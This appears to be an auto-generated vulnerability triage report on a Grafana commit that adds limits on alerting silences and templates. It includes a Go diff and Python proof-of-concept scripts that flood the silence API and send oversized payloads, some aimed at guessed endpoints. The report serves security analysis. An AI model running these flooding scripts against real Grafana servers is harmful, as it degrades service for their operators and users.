Denial of Service (resource exhaustion)

MEDIUM

grafana/grafana

Commit: 6c53264c2c58

Affected: Versions prior to Grafana 12.4.0 (e.g., 12.3.x and earlier)

2026-04-03 21:36 UTC

Description

The commit adds tenant-scoped limits validation for alerting templates and silences. It introduces a LimitsProvider interface with Noop and Remote implementations and wires it into the template and silence services. The aim is to prevent resource exhaustion (DoS) by enforcing count limits on create and size limits on create and update, so that configuration later synced to a remote Alertmanager is not rejected. Limits are fetched from the remote Alertmanager only when Grafana runs in one of the remote Alertmanager modes; with a local Alertmanager the Noop provider is used and no validation happens at this layer. Validation fails open: if the remote limits endpoint is unavailable or returns an error, the operation is allowed. This is a hardening fix for denial-of-service scenarios arising from abuse of template/silence creation and updates, particularly in multi-tenant environments with remote Alertmanager configurations. The change is more than a cleanup: it adds new enforcement logic, a new SilenceLimitsProvider field on the API struct, and new error responses (429 when the silence count limit is reached, 400 when a silence exceeds the size limit).
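The validation rule described above (count checked on create only, size checked on create and update, nothing enforced when no limits are configured) can be sketched as follows. This is a minimal Python illustration, not the Go implementation: the field names on TenantLimits, the use of 0 for "no limit", and the `>=` comparison for the count are all assumptions, because the diff excerpt is truncated before the real validation function.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class TenantLimits:
    # Hypothetical field names; the diff excerpt does not show client.TenantLimits.
    max_silences: int = 0            # 0 means "no limit" in this sketch
    max_silence_size_bytes: int = 0  # 0 means "no limit" in this sketch


def check_silence(limits: Optional[TenantLimits], existing: int,
                  size_bytes: int, is_create: bool) -> str:
    """Return "ok", "limit_exceeded" (count) or "size_exceeded"."""
    if limits is None:
        return "ok"  # limits not configured: nothing to enforce
    # The count check applies to creates only; an update adds no new silence.
    if is_create and limits.max_silences > 0 and existing >= limits.max_silences:
        return "limit_exceeded"
    # The size check applies to both creates and updates.
    if limits.max_silence_size_bytes > 0 and size_bytes > limits.max_silence_size_bytes:
        return "size_exceeded"
    return "ok"


limits = TenantLimits(max_silences=2, max_silence_size_bytes=1024)
print(check_silence(limits, existing=2, size_bytes=100, is_create=True))
print(check_silence(limits, existing=2, size_bytes=100, is_create=False))
print(check_silence(limits, existing=0, size_bytes=4096, is_create=False))
```

In the commit, the two failure cases map to distinct errors: ErrSilenceLimitExceeded (HTTP 429) and ErrSilenceSizeExceeded (HTTP 400).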

Proof of Concept

PoC: Demonstrate potential DoS due to unlimited template/silence creation prior to this fix

Prerequisites:
- Grafana instance (version 12.3.x or earlier) with alerting enabled and support for silences/templates; multi-tenant setup; ability to create silences via API; API token with appropriate permissions.
- Optional: remote alertmanager integration disabled, misconfigured, or reachable depending on test scenario.

Goal: Show resource exhaustion (DoS) via mass creation of silences or extremely large silences when limits are not enforced.

Attack surface (before fix): unlimited creation of silences/templates or oversized payloads can consume memory, CPU, and storage, potentially causing degraded performance or service outages, especially under high-velocity or multi-tenant workloads.

PoC Scenario 1 — Flood silences to exhaust resources (typical DoS via mass creation):
- Use Grafana API to repeatedly create silences in a short time.
- Each request creates a minimal silence; the sum of many silences taxes memory/processing and may impact alertmanager syncing.
- Expected result before fix: silences are created at a high rate and resource usage rises; the server may eventually return 429/500 responses (if rate limiting is in place or the service is overloaded) or degrade.

Python (conceptual; endpoints may vary by version):

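import os
import time
from datetime import datetime, timedelta, timezone

import requests

GRAFANA_BASE = os.environ.get("GRAFANA_BASE", "http://localhost:3000")
API_TOKEN = os.environ.get("GRAFANA_TOKEN")
if not API_TOKEN:
    raise SystemExit("Set GRAFANA_TOKEN to an API token for a test instance")
HEADERS = {"Authorization": f"Bearer {API_TOKEN}", "Content-Type": "application/json"}


def iso(dt):
    """Format a UTC datetime as an RFC 3339 timestamp."""
    return dt.strftime("%Y-%m-%dT%H:%M:%SZ")


# Alertmanager-style validation typically rejects a silence whose end time is
# in the past, so compute the window at run time instead of hard-coding dates.
now = datetime.now(timezone.utc)
silence_payload = {
    "comment": "poc-dos",
    "createdBy": "tester",
    "startsAt": iso(now),
    "endsAt": iso(now + timedelta(days=1)),
    "matchers": [{"name": "alertname", "value": "TestAlert", "isRegex": False}],
}

# Candidate (url, wrap) pairs; the right path depends on the Grafana version.
# The first two paths and the {"silence": ...} wrapper are unverified guesses.
# Grafana's Alertmanager-compatible API is usually served at
# /api/alertmanager/grafana/api/v2/silences and takes the bare silence object.
endpoints = [
    (f"{GRAFANA_BASE}/api/alerting/silences", True),
    (f"{GRAFANA_BASE}/api/alerts/silences", True),
    (f"{GRAFANA_BASE}/api/alertmanager/grafana/api/v2/silences", False),
]


def create_silence(url, wrap):
    """POST one silence and return the HTTP status code."""
    payload = {"silence": silence_payload} if wrap else silence_payload
    r = requests.post(url, json=payload, headers=HEADERS, timeout=5)
    return r.status_code


for i in range(1000):  # adjust range to test local capacity
    for url, wrap in endpoints:
        try:
            code = create_silence(url, wrap)
            print(i, url, code)
        except requests.RequestException as e:
            print(i, url, "ERR", e)
    time.sleep(0.05)  # rapid bursts; adjust as needed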

# Expected result: high throughput of creation requests leading to rising memory/CPU usage on Grafana side in pre-fix versions.

PoC Scenario 2 — Create oversized silences to test size validation (if unpatched):
- Craft a single silence with an extremely large comment and a large number of matchers to exceed any potential size limit.
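- Observe the server response: before the fix, large payloads may be accepted and consume resources; after the fix, with a remote Alertmanager configured and its limits endpoint reachable, an oversized silence is rejected with a 400 response ("Silence size exceeds the maximum allowed size.").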

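from datetime import datetime, timedelta, timezone

# Compute the window at run time so that endsAt lies in the future.
now = datetime.now(timezone.utc)
payload_large = {
    "silence": {
        "comment": "x" * 1_000_000,  # ~1 MB comment as a stress test
        "createdBy": "tester",
        "startsAt": now.strftime("%Y-%m-%dT%H:%M:%SZ"),
        "endsAt": (now + timedelta(days=1)).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "matchers": [{"name": f"m{i}", "value": "v", "isRegex": False} for i in range(200)],
    }
}
# POST this payload to the same endpoints (send only the inner object if the
# endpoint expects a bare silence) and observe the response.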
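To judge whether a payload is likely to trip a size limit, it helps to measure its serialized size before sending it. The helper below is a rough sketch: the patched silence_svc.go imports encoding/json, which suggests (but, given the truncated diff, does not confirm) that the size check is made on a JSON encoding of the silence. The function name and the compact-encoding choice are assumptions for illustration.

```python
import json


def serialized_size(payload: dict) -> int:
    """Return the size in bytes of the compact JSON encoding of payload."""
    return len(json.dumps(payload, separators=(",", ":")).encode("utf-8"))


small = {
    "comment": "poc",
    "matchers": [{"name": "alertname", "value": "TestAlert", "isRegex": False}],
}
large = {
    "comment": "x" * 1_000_000,
    "matchers": [{"name": f"m{i}", "value": "v", "isRegex": False} for i in range(200)],
}

print("small:", serialized_size(small), "bytes")
print("large:", serialized_size(large), "bytes")
```

Stepping the comment length up gradually, rather than jumping straight to 1 MB, makes it easier to find the point at which a patched server starts rejecting requests.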

Note: This PoC targets the pre-fix behavior, where no limits were enforced at this layer. With the fix applied and a remote Alertmanager configured, the API rejects oversized silences (400) and refuses new silences once the per-tenant count limit is reached (429), which blocks or significantly mitigates the behavior shown here. Because validation fails open and is skipped for a local Alertmanager, results depend on the deployment. Run the PoC only in a controlled test environment and with proper authorization.
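When comparing pre-fix and post-fix runs, the responses can be bucketed by the error codes the commit introduces. The sketch below relies on the two message IDs visible in the diff (alerting.notifications.silences.limitExceeded, mapped to 429, and alerting.notifications.silences.sizeExceeded, mapped to 400). That the message ID is available to the client as a string is an assumption, so the function also falls back to the status code alone; interpret_response is a hypothetical helper name.

```python
def interpret_response(status_code: int, message_id: str = "") -> str:
    """Classify a silence API response for pre-fix/post-fix comparison."""
    if message_id.endswith("silences.limitExceeded"):
        return "count limit reached"
    if message_id.endswith("silences.sizeExceeded"):
        return "size limit exceeded"
    if status_code == 429:
        # Without a message ID this could also be an unrelated rate limiter.
        return "count limit reached or rate limited"
    if status_code == 400:
        return "bad request (size limit or other validation failure)"
    if 200 <= status_code < 300:
        return "accepted"
    return "other"


for code, mid in [(202, ""), (429, "alerting.notifications.silences.limitExceeded"),
                  (400, "alerting.notifications.silences.sizeExceeded"), (500, "")]:
    print(code, interpret_response(code, mid))
```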

Commit Details

Author: William Wernert

Date: 2026-03-13 14:55 UTC

Message:

Alerting: Add limits validation for templates and silences (#116787)

* Alerting: Add limits validation for templates and silences

Fetch tenant-scoped limits from remote alertmanager before allowing
template or silence creation/updates. This prevents sync failures when
the config is later pushed to the remote alertmanager.

- Add GetLimits() to MimirClient to call GET /api/v1/limits
- Add LimitsProvider interface with Noop and Remote implementations
- Validate count limits on create, size limits on create and update
- Fail open if limits endpoint unavailable or returns error

* Refactor template service to use WithLimitsProvider pattern

This change restructures how limits are applied to the template service
to avoid merge conflicts with security patches. Instead of passing the
limits provider as a constructor parameter, we now use a builder pattern
with WithLimitsProvider() method, similar to WithIncludeImported().

This keeps the NewTemplateService() signature unchanged, allowing
security patches that use these lines as context to apply cleanly.
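The builder-style wiring described in the commit message can be illustrated with a short sketch: the constructor keeps its signature, and an optional dependency is attached afterwards through a With... method. The Python below is an analogy only. The class layout, the store field, and the max_templates key are hypothetical, and whether the Go WithLimitsProvider() returns a copy or mutates the receiver is not visible in the diff excerpt; this sketch returns a copy.

```python
from dataclasses import dataclass, replace
from typing import Callable, Optional


@dataclass(frozen=True)
class TemplateService:
    store: str
    # Optional dependency; None plays the role of "no limits provider".
    limits_provider: Optional[Callable[[], Optional[dict]]] = None

    def with_limits_provider(self, provider) -> "TemplateService":
        """Return a copy of the service with the limits provider attached."""
        return replace(self, limits_provider=provider)


def new_template_service(store: str) -> TemplateService:
    """Constructor whose signature stays unchanged by the new feature."""
    return TemplateService(store=store)


base = new_template_service("config-store")
limited = base.with_limits_provider(lambda: {"max_templates": 10})
print(base.limits_provider is None, limited.limits_provider())
```

The benefit named in the commit message is practical rather than architectural: patches that touch the constructor call site keep applying cleanly because that line does not change.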

Triage Assessment

Vulnerability Type: Denial of Service (resource exhaustion)

Confidence: MEDIUM

Reasoning:

The commit adds tenant-scoped limits validation for templates and silences and introduces a limits provider to enforce count and size limits. This mitigates abuse that could lead to resource exhaustion or denial of service in alerting, which makes it a security hardening improvement. It also fails open when the limits endpoint is unavailable or returns an error: a design trade-off that favors availability, at the cost of limits not being enforced while the endpoint is down.
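The fail-open trade-off can be made concrete with a small sketch. When the limits fetch succeeds, the count limit is enforced; when it raises, the caller gets "no limits" and every request is allowed. The function names and the max_silences key are hypothetical and stand in for the Remote provider and its call to the limits endpoint.

```python
from typing import Callable, Optional


def get_limits_fail_open(fetch: Callable[[], dict]) -> Optional[dict]:
    """Return limits from fetch(), or None (no enforcement) if the fetch fails."""
    try:
        return fetch()
    except Exception:
        # Fail open: an unavailable limits endpoint must not block the operation.
        return None


def creation_allowed(limits: Optional[dict], current_count: int) -> bool:
    """Allow creation unless a known count limit has been reached."""
    if limits is None:
        return True
    return current_count < limits["max_silences"]


def healthy() -> dict:
    return {"max_silences": 100}


def unavailable() -> dict:
    raise ConnectionError("limits endpoint unreachable")


print(creation_allowed(get_limits_fail_open(healthy), 100))
print(creation_allowed(get_limits_fail_open(unavailable), 1_000_000))
```

The second call shows the cost of the design: while the limits endpoint is down, the pre-fix behavior effectively returns.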

Verification Assessment

Vulnerability Type: Denial of Service (resource exhaustion)

Confidence: MEDIUM

Affected Versions: Versions prior to Grafana 12.4.0 (e.g., 12.3.x and earlier)

Code Diff

diff --git a/pkg/services/ngalert/api/api.go b/pkg/services/ngalert/api/api.go
index d2ac5cd4768de..8628759eba997 100644
--- a/pkg/services/ngalert/api/api.go
+++ b/pkg/services/ngalert/api/api.go
@@ -54,38 +54,39 @@ type RuleAccessControlService interface {
 
 // API handlers.
 type API struct {
-	Cfg                  *setting.Cfg
-	DatasourceCache      datasources.CacheService
-	DatasourceService    datasources.DataSourceService
-	RouteRegister        routing.RouteRegister
-	QuotaService         quota.Service
-	TransactionManager   provisioning.TransactionManager
-	ProvenanceStore      provisioning.ProvisioningStore
-	RuleStore            RuleStore
-	AlertingStore        store.AlertingStore
-	AdminConfigStore     store.AdminConfigurationStore
-	DataProxy            *datasourceproxy.DataSourceProxyService
-	MultiOrgAlertmanager *notifier.MultiOrgAlertmanager
-	StateManager         state.AlertInstanceManager
-	RuleStatusReader     apiprometheus.StatusReader
-	AccessControl        ac.AccessControl
-	ReceiverService      *notifier.ReceiverService
-	ReceiverTestService  *notifier.ReceiverTestingService
-	RouteService         *routes.Service
-	Policies             *provisioning.NotificationPolicyService
-	ContactPointService  *provisioning.ContactPointService
-	Templates            *provisioning.TemplateService
-	MuteTimings          *provisioning.MuteTimingService
-	InhibitionRules      *inhibition_rules.Service
-	AlertRules           *provisioning.AlertRuleService
-	AlertsRouter         *sender.AlertsRouter
-	EvaluatorFactory     eval.EvaluatorFactory
-	ConditionValidator   *eval.ConditionValidator
-	FeatureManager       featuremgmt.FeatureToggles
-	Historian            Historian
-	Tracer               tracing.Tracer
-	AppUrl               *url.URL
-	UserService          user.Service
+	Cfg                   *setting.Cfg
+	DatasourceCache       datasources.CacheService
+	DatasourceService     datasources.DataSourceService
+	RouteRegister         routing.RouteRegister
+	QuotaService          quota.Service
+	TransactionManager    provisioning.TransactionManager
+	ProvenanceStore       provisioning.ProvisioningStore
+	RuleStore             RuleStore
+	AlertingStore         store.AlertingStore
+	AdminConfigStore      store.AdminConfigurationStore
+	DataProxy             *datasourceproxy.DataSourceProxyService
+	MultiOrgAlertmanager  *notifier.MultiOrgAlertmanager
+	StateManager          state.AlertInstanceManager
+	RuleStatusReader      apiprometheus.StatusReader
+	AccessControl         ac.AccessControl
+	ReceiverService       *notifier.ReceiverService
+	ReceiverTestService   *notifier.ReceiverTestingService
+	RouteService          *routes.Service
+	Policies              *provisioning.NotificationPolicyService
+	ContactPointService   *provisioning.ContactPointService
+	Templates             *provisioning.TemplateService
+	MuteTimings           *provisioning.MuteTimingService
+	InhibitionRules       *inhibition_rules.Service
+	AlertRules            *provisioning.AlertRuleService
+	AlertsRouter          *sender.AlertsRouter
+	EvaluatorFactory      eval.EvaluatorFactory
+	ConditionValidator    *eval.ConditionValidator
+	FeatureManager        featuremgmt.FeatureToggles
+	Historian             Historian
+	Tracer                tracing.Tracer
+	AppUrl                *url.URL
+	UserService           user.Service
+	SilenceLimitsProvider notifier.LimitsProvider
 
 	// Hooks can be used to replace API handlers for specific paths.
 	Hooks *Hooks
@@ -127,6 +128,7 @@ func (api *API) RegisterAPIEndpoints(m *metrics.API) {
 				api.MultiOrgAlertmanager,
 				api.RuleStore,
 				ruleAuthzService,
+				api.SilenceLimitsProvider,
 			),
 			receiverAuthz: accesscontrol.NewReceiverAccess[ReceiverStatus](api.AccessControl, false),
 		},

diff --git a/pkg/services/ngalert/api/api_alertmanager_test.go b/pkg/services/ngalert/api/api_alertmanager_test.go
index c8f4f2f7e9ee1..bc50bf09168a2 100644
--- a/pkg/services/ngalert/api/api_alertmanager_test.go
+++ b/pkg/services/ngalert/api/api_alertmanager_test.go
@@ -582,7 +582,7 @@ func createSut(t *testing.T) AlertmanagerSrv {
 		ac:             ac,
 		log:            log,
 		featureManager: featuremgmt.WithFeatures(),
-		silenceSvc:     notifier.NewSilenceService(accesscontrol.NewSilenceService(ac, ruleStore), ruleStore, log, mam, ruleStore, ruleAuthzService),
+		silenceSvc:     notifier.NewSilenceService(accesscontrol.NewSilenceService(ac, ruleStore), ruleStore, log, mam, ruleStore, ruleAuthzService, nil),
 	}
 }
 

diff --git a/pkg/services/ngalert/ngalert.go b/pkg/services/ngalert/ngalert.go
index 9c73ff62d4047..5437cbf950dfb 100644
--- a/pkg/services/ngalert/ngalert.go
+++ b/pkg/services/ngalert/ngalert.go
@@ -477,10 +477,43 @@ func (ng *AlertNG) init() error {
 		false, // imported resources are not exposed via provisioning APIs
 	)
 
+	// Create limits provider based on alertmanager mode.
+	// The provider is used for both template and silence limit validation.
+	// Both provisioning.LimitsProvider and notifier.LimitsProvider interfaces have identical
+	// signatures, so NoopLimitsProvider and RemoteLimitsProvider satisfy both via structural typing.
+	var limitsProvider provisioning.LimitsProvider
+	if remotePrimary || remoteSecondary || remoteSecondaryWithRemoteState {
+		// For remote alertmanager, create a MimirClient to fetch limits
+		remoteURL, err := url.Parse(ng.Cfg.UnifiedAlerting.RemoteAlertmanager.URL)
+		if err != nil {
+			ng.Log.Warn("Failed to parse remote alertmanager URL for limits provider, using noop limits", "error", err)
+			limitsProvider = &provisioning.NoopLimitsProvider{}
+		} else {
+			mimirCfg := &remoteClient.Config{
+				URL:      remoteURL,
+				TenantID: ng.Cfg.UnifiedAlerting.RemoteAlertmanager.TenantID,
+				Password: ng.Cfg.UnifiedAlerting.RemoteAlertmanager.Password,
+				Logger:   log.New("ngalert.remote.limits"),
+				Timeout:  ng.Cfg.UnifiedAlerting.RemoteAlertmanager.Timeout,
+			}
+			mimirClient, err := remoteClient.New(mimirCfg, ng.Metrics.GetRemoteAlertmanagerMetrics(), ng.tracer)
+			if err != nil {
+				ng.Log.Warn("Failed to create MimirClient for limits provider, using noop limits", "error", err)
+				limitsProvider = &provisioning.NoopLimitsProvider{}
+			} else {
+				limitsProvider = provisioning.NewRemoteLimitsProvider(mimirClient)
+			}
+		}
+	} else {
+		// For local alertmanager, skip limit validation (limits are enforced at runtime by the alerting library)
+		limitsProvider = &provisioning.NoopLimitsProvider{}
+	}
+
 	// Provisioning
 	policyService := provisioning.NewNotificationPolicyService(configStore, ng.store, ng.store, ng.Cfg.UnifiedAlerting, ng.Log)
 	contactPointService := provisioning.NewContactPointService(configStore, ng.SecretsService, ng.store, ng.store, provisioningReceiverService, ng.Log, ng.store, ng.ResourcePermissions)
 	templateService := provisioning.NewTemplateService(configStore, ng.store, ng.store, ng.Log)
+	templateServiceWithLimits := templateService.WithLimitsProvider(limitsProvider)
 	muteTimingService := provisioning.NewMuteTimingService(configStore, ng.store, ng.store, ng.Log, ng.store, routeService)
 	inhibitionRuleService := inhibition_rules.NewService(configStore, ng.Log, ng.FeatureToggles)
 	alertRuleService := provisioning.NewAlertRuleService(ng.store, ng.store, ng.folderService, ng.QuotaService, ng.store,
@@ -490,39 +523,40 @@ func (ng *AlertNG) init() error {
 		ac.NewRuleService(ng.accesscontrol))
 
 	ng.Api = &api.API{
-		Cfg:                  ng.Cfg,
-		DatasourceCache:      ng.DataSourceCache,
-		DatasourceService:    ng.DataSourceService,
-		RouteRegister:        ng.RouteRegister,
-		DataProxy:            ng.DataProxy,
-		QuotaService:         ng.QuotaService,
-		TransactionManager:   ng.store,
-		RuleStore:            ng.store,
-		AlertingStore:        ng.store,
-		AdminConfigStore:     ng.store,
-		ProvenanceStore:      ng.store,
-		MultiOrgAlertmanager: ng.MultiOrgAlertmanager,
-		StateManager:         apiStateManager,
-		RuleStatusReader:     apiStatusReader,
-		AccessControl:        ng.accesscontrol,
-		Policies:             policyService,
-		RouteService:         routeService,
-		ReceiverService:      receiverService,
-		ReceiverTestService:  receiverTestService,
-		ContactPointService:  contactPointService,
-		Templates:            templateService,
-		MuteTimings:          muteTimingService,
-		InhibitionRules:      inhibitionRuleService,
-		AlertRules:           alertRuleService,
-		AlertsRouter:         alertsRouter,
-		EvaluatorFactory:     evalFactory,
-		ConditionValidator:   conditionValidator,
-		FeatureManager:       ng.FeatureToggles,
-		AppUrl:               appUrl,
-		Historian:            history,
-		Hooks:                api.NewHooks(ng.Log),
-		Tracer:               ng.tracer,
-		UserService:          ng.userService,
+		Cfg:                   ng.Cfg,
+		DatasourceCache:       ng.DataSourceCache,
+		DatasourceService:     ng.DataSourceService,
+		RouteRegister:         ng.RouteRegister,
+		DataProxy:             ng.DataProxy,
+		QuotaService:          ng.QuotaService,
+		TransactionManager:    ng.store,
+		RuleStore:             ng.store,
+		AlertingStore:         ng.store,
+		AdminConfigStore:      ng.store,
+		ProvenanceStore:       ng.store,
+		MultiOrgAlertmanager:  ng.MultiOrgAlertmanager,
+		StateManager:          apiStateManager,
+		RuleStatusReader:      apiStatusReader,
+		AccessControl:         ng.accesscontrol,
+		Policies:              policyService,
+		RouteService:          routeService,
+		ReceiverService:       receiverService,
+		ReceiverTestService:   receiverTestService,
+		ContactPointService:   contactPointService,
+		Templates:             templateServiceWithLimits,
+		MuteTimings:           muteTimingService,
+		InhibitionRules:       inhibitionRuleService,
+		AlertRules:            alertRuleService,
+		AlertsRouter:          alertsRouter,
+		EvaluatorFactory:      evalFactory,
+		ConditionValidator:    conditionValidator,
+		FeatureManager:        ng.FeatureToggles,
+		AppUrl:                appUrl,
+		Historian:             history,
+		Hooks:                 api.NewHooks(ng.Log),
+		Tracer:                ng.tracer,
+		UserService:           ng.userService,
+		SilenceLimitsProvider: limitsProvider,
 	}
 	ng.Api.RegisterAPIEndpoints(ng.Metrics.GetAPIMetrics())
 

diff --git a/pkg/services/ngalert/notifier/multiorg_alertmanager.go b/pkg/services/ngalert/notifier/multiorg_alertmanager.go
index f10147ad9518f..b2b7823b5cca1 100644
--- a/pkg/services/ngalert/notifier/multiorg_alertmanager.go
+++ b/pkg/services/ngalert/notifier/multiorg_alertmanager.go
@@ -42,9 +42,11 @@ var (
 	ErrAlertmanagerNotFound = errutil.NotFound("alerting.notifications.alertmanager.notFound")
 	ErrAlertmanagerConflict = errutil.Conflict("alerting.notifications.alertmanager.conflict")
 
-	ErrSilenceNotFound    = errutil.NotFound("alerting.notifications.silences.notFound")
-	ErrSilencesBadRequest = errutil.BadRequest("alerting.notifications.silences.badRequest")
-	ErrSilenceInternal    = errutil.Internal("alerting.notifications.silences.internal")
+	ErrSilenceNotFound      = errutil.NotFound("alerting.notifications.silences.notFound")
+	ErrSilencesBadRequest   = errutil.BadRequest("alerting.notifications.silences.badRequest")
+	ErrSilenceInternal      = errutil.Internal("alerting.notifications.silences.internal")
+	ErrSilenceLimitExceeded = errutil.TooManyRequests("alerting.notifications.silences.limitExceeded", errutil.WithPublicMessage("Maximum number of silences has been reached. Delete some silences before creating new ones."))
+	ErrSilenceSizeExceeded  = errutil.BadRequest("alerting.notifications.silences.sizeExceeded", errutil.WithPublicMessage("Silence size exceeds the maximum allowed size."))
 )
 
 //go:generate mockery --name Alertmanager --structname AlertmanagerMock --with-expecter --output alertmanager_mock --outpkg alertmanager_mock

diff --git a/pkg/services/ngalert/notifier/silence_svc.go b/pkg/services/ngalert/notifier/silence_svc.go
index aab960a4bcd37..536a2968ccab7 100644
--- a/pkg/services/ngalert/notifier/silence_svc.go
+++ b/pkg/services/ngalert/notifier/silence_svc.go
@@ -2,6 +2,7 @@ package notifier
 
 import (
 	"context"
+	"encoding/json"
 
 	"golang.org/x/exp/maps"
 
@@ -10,16 +11,24 @@ import (
 	"github.com/grafana/grafana/pkg/apimachinery/identity"
 	"github.com/grafana/grafana/pkg/infra/log"
 	"github.com/grafana/grafana/pkg/services/ngalert/models"
+	"github.com/grafana/grafana/pkg/services/ngalert/remote/client"
 )
 
+// LimitsProvider provides access to alertmanager limits for validation.
+type LimitsProvider interface {
+	// GetLimits retrieves the current limits. Returns nil limits (not an error) if limits are not configured.
+	GetLimits(ctx context.Context) (*client.TenantLimits, error)
+}
+
 // SilenceService is the authenticated service for managing alertmanager silences.
 type SilenceService struct {
-	authz     SilenceAccessControlService
-	xact      transactionManager
-	log       log.Logger
-	store     SilenceStore
-	ruleStore RuleStore
-	ruleAuthz RuleAccessControlService
+	authz          SilenceAccessControlService
+	xact           transactionManager
+	log            log.Logger
+	store          SilenceStore
+	ruleStore      RuleStore
+	ruleAuthz      RuleAccessControlService
+	limitsProvider LimitsProvider
 }
 
 type RuleAccessControlService interface {
@@ -56,14 +65,16 @@ func NewSilenceService(
 	store SilenceStore,
 	ruleStore RuleStore,
 	ruleAuthz RuleAccessControlService,
+	limitsProvider LimitsProvider,
 ) *SilenceService {
 	return &SilenceService{
-		authz:     authz,
-		xact:      xact,
-		log:       log,
-		store:     store,
-		ruleStore: ruleStore,
-		ruleAuthz: ruleAuthz,
+		authz:          authz,
+		xact:           xact,
+		log:            log,
+		store:          store,
+		ruleStore:      ruleStore,
+		ruleAuthz:      ruleAuthz,
+		limitsProvider: limitsProvider,
 	}
 }
 
@@ -100,6 +111,11 @@ func (s *SilenceService) CreateSilence(ctx context.Context, user identity.Reques
 		return "", err
 	}
 
+	// Validate limits before creating
+	if err := s.validateSilenceLimits(ctx, user.GetOrgID(), ps, true); err != nil {
+		return "", err
+	}
+
 	silenceId, err := s.store.CreateSilence(ctx, user.GetOrgID(), ps)
 	if err != nil {
 		return "", err
@@ -125,6 +141,11 @@ func (s *SilenceService) UpdateSilence(ctx context.Context, user identity.Reques
 		return "", err
 	}
 
+	// Validate size limits before updating (count validation not needed for updates)
+	if err := s.validateSilenceLimits(ctx, user.GetOrgID(), ps, false); err != nil {
+		return "", err
+	}
+
 	silenceId, err := s.store.UpdateSilence(ctx, user.GetOrgID(), ps)
 	if err != nil {
 		return "", err
@@ -254,3 +275,57 @@ func validateSilenceUpdate(existing *models.Silence, new models.Silence) error {
 
 	return nil
 }
+
+// validateSilenceLimits checks if creating or updating a silence would exceed configured limits.
+// orgID is the organization ID to fetch silences for count
... [truncated]
